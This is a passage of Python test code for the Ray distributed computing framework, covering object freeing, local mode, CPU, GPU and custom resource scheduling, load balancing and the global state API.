def flush(actors):
# Flush the release history.
# The current plasma client cache maintains a 64-item list;
# if that number changes, this test will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run with local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run with local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object is the one stored in the same object store as the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert_equal(xref, np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert_equal(xref, ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert_equal(y, ray.put(y))
# Make sure objects are immutable; this example is why we need to copy
# arguments before passing them into remote functions in Python mode.
aref = local_mode_f.remote()
assert_equal(aref, np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert_equal(aref, np.array([0, 0]))
assert_equal(bref, np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert_equal(ready, object_ids[:num_returns])
assert_equal(remaining, object_ids[num_returns:])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert_equal(test_actor.get_array.remote(), np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert_equal(test_array, np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert_equal(test_array, test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each f5 task uses 5 GPUs, so only
# 2 tasks can be scheduled at a given time. Therefore, if we wait
# for 2 tasks to finish, it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot schedule another actor that requires 0.7 of
# the custom resource, since only 0.3 is left. TODO(rkn): Re-enable
# this once ray.wait is implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requires only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resource gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the current value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of h submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.test.test_utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.test.test_utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all local
# schedulers in a roughly equal manner even when the tasks have
# dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the local schedulers. Make sure
# this doesn't prevent tasks from being scheduled on other local
# schedulers.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
with pytest.raises(Exception):
ray.global_state.log_files()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "runtest.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "runtest"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_log_file_api(shutdown_only):
ray.init(num_cpus=1, redirect_worker_output=True)
message = "unique message"
@ray.remote
def f():
logger.info(message)
# The call to sys.stdout.flush() seems to be necessary when using
# the system Python 2.7 on Ubuntu.
sys.stdout.flush()
ray.get(f.remote())
# Make sure that the message appears in the log files.
start_time = time.time()
found_message = False
while time.time() - start_time < 10:
log_files = ray.global_state.log_files()
for ip, innerdict in log_files.items():
for filename, contents in innerdict.items():
contents_str = "".join(contents)
if message in contents_str:
found_message = True
if found_message:
break
time.sleep(0.1)
assert found_message is True
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(redirect_worker_output=True, num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(driver_id=dummy_driver_id)
@ray.remote
def f():
return ray.worker.global_worker.task_driver_id.binary()
assert_equal(dummy_driver_id.binary(), ray.worker.global_worker.worker_id)
task_driver_id = ray.get(f.remote())
assert_equal(dummy_driver_id.binary(), task_driver_id)
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle() == "ray_worker:runtest.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
